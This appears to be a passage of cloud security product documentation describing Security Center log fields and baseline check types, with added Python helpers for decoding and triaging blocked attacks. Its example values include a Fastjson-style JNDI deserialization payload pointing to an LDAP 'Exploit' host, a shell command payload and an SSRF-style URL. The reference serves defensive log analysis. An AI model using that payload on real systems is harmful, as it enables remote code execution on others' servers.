instance_result | The impact of the risk. The value is a JSON string. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | The subtype of the instance. Valid values: | INSTANCE |
instance_type | The instance type. Valid values: | ECS |
region_id | The ID of the region where the instance resides. | cn-hangzhou |
requirement_id | The requirement ID. You can call the ListCheckStandard operation to obtain the ID. | 5 |
risk_level | The risk level. Valid values: | MEDIUM |
section_id | The section ID. You can call the ListCheckResult operation to obtain the ID. | 1 |
standard_id | The standard ID. You can call the ListCheckStandard operation to obtain the ID. | 1 |
status | The status of the check item. Valid values: | PASS |
vendor | The cloud service provider. The value is fixed to ALIYUN. | ALIYUN |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Network defense logs
Field | Description | Example |
cmd | The command line of the attacked process. | nginx: master process nginx |
cur_time | The time when the attack event occurred. | 2023-09-14 09:21:59 |
decode_payload | The payload converted from HEX format to characters. | POST /Services/FileService/UserFiles/ |
dst_ip | The IP address of the attacked asset. | 172.16.XX.XX |
dst_port | The port of the attacked asset. | 80 |
func | The type of the intercepted event. Valid values: | payload |
rule_type | The specific rule type of the intercepted event. Valid values: | alinet_payload |
instance_id | The instance ID of the attacked asset. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the attacked asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the attacked asset. | 192.168.XX.XX |
final_action | The defense action mode. The value is block (intercepted). | block |
payload | The payload in HEX format. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | The ID of the attacked process. | 7107 |
platform | The system type of the attacked asset. Valid values: | linux |
proc_path | The path of the attacked process. | /usr/sbin/nginx |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address that initiated the attack. | 106.11.XX.XX |
src_port | The source port that initiated the attack. | 29575 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
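The network defense log carries the blocked request twice: `payload` as HEX and `decode_payload` as the characters it decodes to. When you pull these logs out of Simple Log Service for triage, decoding the HEX yourself gives the whole request rather than the excerpt, and the request line and headers are what an analyst looks at first. The following is an added example, not Security Center's own code: the log record and the HTTP request inside it are constructed; the only page-derived value is the table's example `payload`, which, like the other examples on this page, is masked with a trailing `****`, so the decoder drops a trailing mask before decoding.

```python
"""Added example (not Security Center's code): decode the HEX payload of a
network defense log record and summarize the blocked HTTP request."""
import binascii

# The `payload` example value from the table above; its tail is masked with ****.
PAGE_EXAMPLE_HEX = ("504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20"
                    "746578742f706c61696e0d0a557365722d4167656e743a20****")

# A constructed request, hex-encoded the way the payload field carries it.
CONSTRUCTED_REQUEST = (
    b"POST /Services/FileService/UserFiles/ HTTP/1.1\r\n"
    b"Host: 172.16.0.10\r\n"
    b"Content-Type: text/plain\r\n"
    b"User-Agent: example-client\r\n"
    b"\r\n"
    b"hello"
)
SAMPLE_PAYLOAD_HEX = binascii.hexlify(CONSTRUCTED_REQUEST).decode("ascii")

# Constructed network defense log record (field names from the table).
SAMPLE_RECORD = {
    "src_ip": "106.11.0.5", "src_port": 29575,
    "dst_ip": "172.16.0.10", "dst_port": 80,
    "func": "payload", "rule_type": "alinet_payload", "final_action": "block",
    "payload": SAMPLE_PAYLOAD_HEX,
}


def decode_payload(payload_hex):
    """HEX payload -> text. Strips a trailing **** mask and a dangling nibble,
    and escapes rather than drops undecodable bytes so binary stays visible."""
    cleaned = payload_hex.strip().rstrip("*")
    if len(cleaned) % 2:
        cleaned = cleaned[:-1]
    return binascii.unhexlify(cleaned).decode("utf-8", errors="backslashreplace")


def parse_http_request(text):
    """Split decoded text into method, path, version, headers and body.
    Returns None when the payload does not start like an HTTP request."""
    head, sep, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "version": parts[2],
            "headers": headers, "body": body if sep else ""}


def summarize(record):
    """One-line triage summary of a blocked request."""
    req = parse_http_request(decode_payload(record["payload"]))
    prefix = f"{record['src_ip']} -> {record['dst_ip']}:{record['dst_port']}"
    if req is None:
        return f"{prefix} non-HTTP payload action={record['final_action']}"
    return (f"{prefix} {req['method']} {req['path']} "
            f"ua={req['headers'].get('user-agent', '-')} action={record['final_action']}")


if __name__ == "__main__":
    print(repr(decode_payload(PAGE_EXAMPLE_HEX)))
    print(summarize(SAMPLE_RECORD))
```

Decoding the page's own example yields `POST / HTTP/1.1` followed by two headers, which is why the decoder is tolerant of a truncated tail: the recorded payload may stop mid-header.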
Application protection logs
Field | Description | Example |
app_dir | The directory where the application resides. | /usr/local/aegis/rasp/apps/1111 |
app_id | The application ID. | 6492a391fc9b4e2aad94**** |
app_name | The application name. | test |
confidence_level | The confidence level of the detection algorithm. Valid values: | low |
request_body | The request body. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | The length of the request body. | 112 |
data | The hook point parameters. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | The request header. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | The name of the host or network device. | testhostname |
host_ip | The private IP address of the host. | 172.16.XX.XX |
is_cliped | Indicates whether the log was truncated because it was too long. Valid values: | false |
jdk_version | The JDK version. | 1.8.0_292 |
message | The alert description. | Unsafe class serial. |
request_method | The request method. | Post |
platform | The operating system type. | Linux |
arch | The operating system architecture. | amd64 |
kernel_version | The operating system kernel version. | 3.10.0-1160.59.1.el7.x86_64 |
param | The request parameters. Common formats include the following: | {"url":["http://127.0.0.1.xip.io"]} |
payload | The attack payload. | bash -c kill -0 -- -'31098' |
payload_length | The length of the attack payload. | 27 |
rasp_id | The unique ID of the application protection probe. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | The version of the application protection probe. | 0.8.5 |
src_ip | The IP address of the requester. | 172.0.XX.XX |
final_action | The alert handling result. Valid values: | block |
rule_action | The alert handling method specified by the rule. Valid values: | block |
risk_level | The risk level. Valid values: | high |
stacktrace | The stack information. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | The time when the alert was triggered. | 2023-10-09 15:19:15 |
timestamp | The timestamp when the alert was triggered, in milliseconds. | 1696835955070 |
type | The attack type. Valid values: | rce |
url | The request URL. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | The UUID of the attack event. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | The host UUID. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | The public IP address of the host. | 1.2.XX.XX |
intranet_ip | The private IP address of the host. | 172.16.XX.XX |
sas_group_name | The name of the server group in Security Center. | Group 1 |
instance_id | The host instance ID. | i-wz995eivg28f1m** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
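As an added example that is not part of the Security Center documentation or product, the following Python reads one application protection log record, constructed from the example values in the table above, and reduces it to the points an analyst checks first: whether the attack was blocked, whether it needs escalation, which client address to trust, and whether the record is internally consistent. The field names are the ones in the table; the sample addresses, the header contents and the function name are assumptions.

```python
import json
from datetime import datetime, timezone

# Constructed application protection log record, assembled from the example
# values in the field table above (addresses and IDs are placeholders).
SAMPLE_RASP_LOG = {
    "type": "rce",
    "risk_level": "high",
    "rule_action": "block",
    "final_action": "block",
    "is_cliped": "false",
    "src_ip": "172.0.0.10",
    "headers": '{"host":"192.0.2.8:8080","x-forwarded-for":"198.51.100.7",'
               '"user-agent":"msnbot","content-type":"application/json"}',
    "payload": "bash -c kill -0 -- -'31098'",
    "payload_length": "27",
    "timestamp": "1696835955070",
    "start_time": "1696835955",
}


def triage_rasp_event(rec):
    """Turn one application protection log into a triage summary: was the
    attack blocked, does it need escalation, which client IP to trust, and
    is the record internally consistent (timestamps, payload, truncation)."""
    headers = json.loads(rec.get("headers") or "{}")
    warnings = []
    # timestamp is in milliseconds, start_time in seconds; both describe the
    # moment the event occurred and must agree once reduced to seconds.
    ts_sec = int(rec["timestamp"]) // 1000
    if rec.get("start_time") and int(rec["start_time"]) != ts_sec:
        warnings.append("timestamp and start_time disagree")
    if rec.get("is_cliped") == "true":
        warnings.append("record was truncated (is_cliped=true)")
    payload = rec.get("payload", "")
    if int(rec.get("payload_length", len(payload))) != len(payload):
        warnings.append("payload_length does not match payload")
    blocked = rec.get("final_action") == "block"
    return {
        "attack_type": rec.get("type"),
        "risk_level": rec.get("risk_level"),
        "blocked": blocked,
        # Escalate when the rule prescribed a block that did not take effect,
        # or when a high-risk attack reached the application unblocked.
        "needs_review": not blocked
        and (rec.get("rule_action") == "block" or rec.get("risk_level") == "high"),
        # src_ip is the address the probe observed; X-Forwarded-For is a
        # client-supplied header that can be forged, so report it but do not
        # treat it as the requester's address on its own.
        "observed_src_ip": rec.get("src_ip"),
        "claimed_client_ip": headers.get("x-forwarded-for"),
        # UTC rendering; the table's `time` example is this value plus 8 hours (UTC+8).
        "event_time_utc": datetime.fromtimestamp(ts_sec, tz=timezone.utc).isoformat(),
        "warnings": warnings,
    }
```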
Malware detection logs
Field | Description | Example |
bucket_name | The bucket name. | ***-test |
event_id | The alert ID. | 802210 |
event_name | The alert name. | Mining program |
md5 | The MD5 hash of the file. | 6bc2bc******53d409b1 |
sha256 | The SHA256 hash of the file. | f038f9525******7772981e87f85 |
result | The detection result. Valid values: | 0 |
file_path | The file path. | test.zip/bin_test |
etag | The OSS file identifier. | 6BC2B******853D409B1 |
risk_level | The risk level. Valid values: | remind |
source | The detection scenario. Valid values: | OSS |
parent_md5 | The MD5 hash of the parent file or compressed package. | 3d0f8045bb9****** |
parent_sha256 | The SHA256 hash of the parent file or compressed package. | 69b643d6******a3fb859fa |
parent_file_path | The name of the parent file or compressed package. | test.zip |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Core file monitoring event logs
Field | Description | Example |
start_time | The most recent time the event occurred. Unit: seconds. | 1718678414 |
uuid | The UUID of the agent. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | The file path. | /etc/passwd |
proc_path | The process path. | /usr/bin/bash |
rule_id | The ID of the rule that was hit. | 123 |
rule_name | The rule name. | file_test_rule |
cmdline | The command line. | bash /opt/a |
operation | The operation on the file. | READ |
risk_level | The alert level. | 2 |
pid | The process ID. | 45324 |
proc_permission | The process permissions. | rwxrwxrwx |
instance_id | The instance ID. | i-wz995eivg2**** |
internet_ip | The public IP address. | 192.0.2.1 |
intranet_ip | The private IP address. | 172.16.0.1 |
instance_name | The instance name. | aegis-test |
platform | The operating system type. | Linux |
Agentless detection logs
Common fields for vulnerabilities, baselines, and malicious samples
Field | Description | Example |
uuid | The server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Vulnerability risk fields
Field | Description | Example |
vul_name | The name of the vulnerability. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | The alias of the vulnerability. | gson code issue vulnerability (CVE-2022-25647) |
vul_primary_id | The primary key ID of the vulnerability. | 990174361 |
type | The vulnerability type. Valid values: | sca |
alert_level | The risk level of the vulnerability. Valid values: | asap |
instance_name | The hostname. | hhht-linux-*** |
operation | The action performed on the vulnerability. Valid values: | new |
status | The status of the vulnerability. Valid values: | 1 |
tag | The tag of the vulnerability. Valid values: Note The tags for other vulnerability types are random strings. | oval |
Baseline check fields
Field | Description | Example |
check_item_name | The name of the check item. | Set password expiration time |
check_item_level | The risk level of the check item. Valid values: | high |
check_type | The type of the check item. | Identity authentication |
risk_level | The level of the risk item. Valid values: | low |
operation | The operation. Valid values: | new |
risk_name | The name of the risky check item. | Password policy compliance check |
status | The status of the check item. Valid values: | 1 |
sub_type_alias_name | The alias of the subtype. | Alibaba Cloud Standard - CentOS Linux 7/8 Security Baseline |
sub_type_name | The name of the baseline subtype. For more information about the valid values of the baseline subtype, see List of baseline types and subtypes. | hc_centos7 |
type_name | The type name. | hc_best_security |
type_alias_name | The alias of the type. | Best practices |
container_id | The container ID. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | The container name. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Malicious sample fields
Field | Description | Example |
alert_level | The risk level of the alert event. Valid values: | suspicious |
alert_name | The name of the malicious sample alert. | Suspicious Process-SSH-based |
operation | The operation. Valid values: | new |
status | The risk status of the malicious sample. Valid values: | 0 |
suspicious_event_id | The alert event ID. | 909361 |
Sensitive file fields
Field | Description | Example |
alert_level | The risk level. Valid values: | high |
rule_name | The file type name. | Ionic token |
file_path | The path of the sensitive file. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | The check result. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Appendix
List of baseline types and subtypes
Type name | Subtype name | Description |
hc_exploit | hc_exploit_redis | Important threat exploit: Unauthorized access to Redis |
hc_exploit | hc_exploit_activemq | Important threat exploit: Unauthorized access to ActiveMQ |
hc_exploit | hc_exploit_couchdb | Important threat exploit: Unauthorized access to CouchDB |
hc_exploit | hc_exploit_docker | Important threat exploit: Unauthorized access to Docker |
hc_exploit | hc_exploit_es | Important threat exploit: Unauthorized access to Elasticsearch |
hc_exploit | hc_exploit_hadoop | Important threat exploit: Unauthorized access to Hadoop |
hc_exploit | hc_exploit_jboss | Important threat exploit: Unauthorized access to JBoss |
hc_exploit | hc_exploit_jenkins | Important threat exploit: Unauthorized access to Jenkins |
hc_exploit | hc_exploit_k8s_api | Important threat exploit: Unauthorized access to Kubernetes API server |
hc_exploit | hc_exploit_ldap | Important threat exploit: Unauthorized access to LDAP (Windows environment) |
hc_exploit | hc_exploit_ldap_linux | Important threat exploit: Unauthorized access to OpenLDAP (Linux environment) |
hc_exploit | hc_exploit_memcache | Important threat exploit: Unauthorized access to Memcached |
hc_exploit | hc_exploit_mongo | Important threat exploit: Unauthorized access to MongoDB |
hc_exploit | hc_exploit_pgsql | Important threat exploit: Unauthorized access to PostgreSQL |
hc_exploit | hc_exploit_rabbitmq | Important threat exploit: Unauthorized access to RabbitMQ |
hc_exploit | hc_exploit_rsync | Important threat exploit: Unauthorized access to rsync |
hc_exploit | hc_exploit_tomcat | Important threat exploit: Apache Tomcat AJP file inclusion vulnerability |
hc_exploit | hc_exploit_zookeeper | Important threat exploit: Unauthorized access to ZooKeeper |
hc_container | hc_docker | Alibaba Cloud standard: Docker security baseline check |
hc_container | hc_middleware_ack_master | International security best practices: Kubernetes (ACK) master node security baseline check |
hc_container | hc_middleware_ack_node | International security best practices: Kubernetes (ACK) node security baseline check |
hc_container | hc_middleware_k8s | Alibaba Cloud standard: Kubernetes master node security baseline check |
hc_container | hc_middleware_k8s_node | Alibaba Cloud standard: Kubernetes node security baseline check |
cis | hc_suse15_djbh | MLPS 2.0 Level 3: SUSE 15 compliance baseline check |
cis | hc_aliyun_linux3_djbh_l3 | MLPS 2.0 Level 3: Alibaba Cloud Linux 3 compliance baseline check |
cis | hc_aliyun_linux_djbh_l3 | MLPS 2.0 Level 3: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check |
cis | hc_bind_djbh | MLPS 2.0 Level 3: Bind compliance baseline check |
cis | hc_centos6_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 6 compliance baseline check |
cis | hc_centos7_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 7 compliance baseline check |
cis | hc_centos8_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 8 compliance baseline check |
cis | hc_debian_djbh_l3 | MLPS 2.0 Level 3: Debian Linux 8/9/10 compliance baseline check |
cis | hc_iis_djbh | MLPS 2.0 Level 3: IIS compliance baseline check |
cis | hc_informix_djbh | MLPS 2.0 Level 3: Informix compliance baseline check |
cis | hc_jboss_djbh | MLPS 2.0 Level 3: JBoss compliance baseline check |
cis | hc_mongo_djbh | MLPS 2.0 Level 3: MongoDB compliance baseline check |
cis | hc_mssql_djbh | MLPS Level 3: SQL Server compliance baseline check |
cis | hc_mysql_djbh | MLPS 2.0 Level 3: MySQL compliance baseline check |
cis | hc_nginx_djbh | MLPS 2.0 Level 3: Nginx compliance baseline check |
cis | hc_oracle_djbh | MLPS Level 3: Oracle compliance baseline check |
cis | hc_pgsql_djbh | MLPS 2.0 Level 3: PostgreSQL compliance baseline check |
cis | hc_redhat6_djbh_l3 | MLPS 2.0 Level 3: Red Hat Linux 6 compliance baseline check |
cis | hc_redhat_djbh_l3 | MLPS Level 3: Red Hat Linux 7 compliance baseline check |
cis | hc_redis_djbh | MLPS 2.0 Level 3: Redis compliance baseline check |
cis | hc_suse10_djbh_l3 | MLPS 2.0 Level 3: SUSE 10 compliance baseline check |
cis | hc_suse12_djbh_l3 | MLPS 2.0 Level 3: SUSE 12 compliance baseline check |
cis | hc_suse_djbh_l3 | MLPS 2.0 Level 3: SUSE 11 compliance baseline check |
cis | hc_ubuntu14_djbh_l3 | MLPS 2.0 Level 3: Ubuntu 14 compliance baseline check |
cis | hc_ubuntu_djbh_l3 | MLPS 2.0 Level 3: Ubuntu 16/18/20 compliance baseline check |
cis | hc_was_djbh | MLPS 2.0 Level 3: WebSphere Application Server compliance baseline check |
cis | hc_weblogic_djbh | MLPS Level 3: WebLogic compliance baseline check |
cis | hc_win2008_djbh_l3 | MLPS 2.0 Level 3: Windows 2008 R2 compliance baseline check |
cis | hc_win2012_djbh_l3 | MLPS 2.0 Level 3: Windows 2012 R2 compliance baseline check |
cis | hc_win2016_djbh_l3 | MLPS 2.0 Level 3: Windows 2016/2019 compliance baseline check |
cis | hc_aliyun_linux_djbh_l2 | MLPS 2.0 Level 2: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check |
cis | hc_centos6_djbh_l2 | MLPS 2.0 Level 2: CentOS Linux 6 compliance baseline check |
cis | hc_centos7_djbh_l2 | MLPS 2.0 Level 2: CentOS Linux 7 compliance baseline check |
cis | hc_debian_djbh_l2 | MLPS 2.0 Level 2: Debian Linux 8 compliance baseline check |
cis | hc_redhat7_djbh_l2 | MLPS 2.0 Level 2: Red Hat Linux 7 compliance baseline check |
cis | hc_ubuntu_djbh_l2 | MLPS 2.0 Level 2: Ubuntu 16/18 compliance baseline check |
cis | hc_win2008_djbh_l2 | MLPS 2.0 Level 2: Windows 2008 R2 compliance baseline check |
cis | hc_win2012_djbh_l2 | MLPS 2.0 Level 2: Windows 2012 R2 compliance baseline check |
cis | hc_win2016_djbh_l2 | MLPS 2.0 Level 2: Windows 2016/2019 compliance baseline check |
cis | hc_aliyun_linux_cis | International security best practices: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check |
cis | hc_centos6_cis_rules | International security best practices: CentOS Linux 6 security baseline check |
cis | hc_centos7_cis_rules | International security best practices: CentOS Linux 7 security baseline check |
cis | hc_centos8_cis_rules | International security best practices: CentOS Linux 8 security baseline check |
cis | hc_debian8_cis_rules | International security best practices: Debian Linux 8 security baseline check |
cis | hc_ubuntu14_cis_rules | International security best practices: Ubuntu 14 security baseline check |
cis | hc_ubuntu16_cis_rules | International security best practices: Ubuntu 16/18/20 security baseline check |
cis | hc_win2008_cis_rules | International security best practices: Windows Server 2008 R2 security baseline check |
cis | hc_win2012_cis_rules | International security best practices: Windows Server 2012 R2 security baseline check |
cis | hc_win2016_cis_rules | International security best practices: Windows Server 2016/2019 R2 security baseline check |
cis | hc_kylin_djbh_l3 | MLPS 2.0 Level 3: Kylin compliance baseline check |
cis | hc_uos_djbh_l3 | MLPS 2.0 Level 3: UOS compliance baseline check |
hc_best_security | hc_aliyun_linux | Alibaba Cloud standard: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check |
hc_best_security | hc_centos6 | Alibaba Cloud standard: CentOS Linux 6 security baseline check |
hc_best_security | hc_centos7 | Alibaba Cloud standard: CentOS Linux 7/8 security baseline check |
hc_best_security | hc_debian | Alibaba Cloud standard: Debian Linux 8/9/10 security baseline check |
hc_best_security | hc_redhat6 | Alibaba Cloud standard: Red Hat Linux 6 security baseline check |
hc_best_security | hc_redhat7 | Alibaba Cloud standard: Red Hat Linux 7/8 security baseline check |
hc_best_security | hc_ubuntu | Alibaba Cloud standard: Ubuntu security baseline check |
hc_best_security | hc_windows_2008 | Alibaba Cloud standard: Windows 2008 R2 security baseline check |
hc_best_security | hc_windows_2012 | Alibaba Cloud standard: Windows 2012 R2 security baseline check |
hc_best_security | hc_windows_2016 | Alibaba Cloud standard: Windows 2016/2019 security baseline check |
hc_best_security | hc_db_mssql | Alibaba Cloud standard: SQL Server security baseline check |
hc_best_security | hc_memcached_ali | Alibaba Cloud standard: Memcached security baseline check |
hc_best_security | hc_mongodb | Alibaba Cloud standard: MongoDB 3.x security baseline check |
hc_best_security | hc_mysql_ali | Alibaba Cloud standard: MySQL security baseline check |
hc_best_security | hc_oracle | Alibaba Cloud standard: Oracle 11g security baseline check |
hc_best_security | hc_pgsql_ali | Alibaba Cloud standard: PostgreSQL security baseline check |
hc_best_security | hc_redis_ali | Alibaba Cloud standard: Redis security baseline check |
hc_best_security | hc_apache | Alibaba Cloud standard: Apache security baseline check |
hc_best_security | hc_iis_8 | Alibaba Cloud standard: IIS 8 security baseline check |
hc_best_security | hc_nginx_linux | Alibaba Cloud standard: Nginx security baseline check |
hc_best_security | hc_suse15 | Alibaba Cloud standard: SUSE Linux 15 security baseline check |
hc_best_security | tomcat7 | Alibaba Cloud standard: Apache Tomcat security baseline check |
weak_password | hc_mongodb_pwd | Weak password: MongoDB logon weak password detection (supports version 2.x) |
weak_password | hc_weakpwd_ftp_linux | Weak password: FTP logon weak password check |
weak_password | hc_weakpwd_linux_sys | Weak password: Linux system logon weak password check |
weak_password | hc_weakpwd_mongodb3 | Weak password: MongoDB logon weak password detection |
weak_password | hc_weakpwd_mssql | Weak password: SQL Server database logon weak password check |
weak_password | hc_weakpwd_mysql_linux | Weak password: MySQL database logon weak password check |
weak_password | hc_weakpwd_mysql_win | Weak password: MySQL database logon weak password check (Windows) |
weak_password | hc_weakpwd_openldap | Weak password: OpenLDAP logon weak password check |
weak_password | hc_weakpwd_oracle | Weak password: Oracle logon weak password detection |
weak_password | hc_weakpwd_pgsql | Weak password: PostgreSQL database logon weak password check |
weak_password | hc_weakpwd_pptp | Weak password: pptpd service logon weak password check |
weak_password | hc_weakpwd_redis_linux | Weak password: Redis database logon weak password check |
weak_password | hc_weakpwd_rsync | Weak password: rsync service logon weak password check |
weak_password | hc_weakpwd_svn | Weak password: SVN service logon weak password check |
weak_password | hc_weakpwd_tomcat_linux | Weak password: Apache Tomcat console weak password check |
weak_password | hc_weakpwd_vnc | Weak password: VNC Server weak password check |
weak_password | hc_weakpwd_weblogic | Weak password: WebLogic 12c logon weak password detection |
weak_password | hc_weakpwd_win_sys | Weak password: Windows system logon weak password check |